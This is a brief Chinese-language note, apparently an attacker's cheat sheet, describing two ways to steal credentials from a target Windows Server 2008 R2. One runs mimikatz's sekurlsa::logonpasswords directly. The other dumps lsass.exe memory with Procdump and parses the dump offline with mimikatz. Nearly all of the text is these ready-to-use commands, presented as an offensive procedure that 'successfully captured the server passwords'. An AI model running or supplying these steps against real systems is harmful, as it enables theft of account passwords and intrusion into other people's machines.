目標機 windows server 2008 R2
第一種方法:
cmd下運行mimikatz.exe,然后依次輸入下面命令
privilege::debug
sekurlsa::logonpasswords
成功抓到服務器密碼


第二種方法:
下載個procdump,https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump,然后
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonpasswords
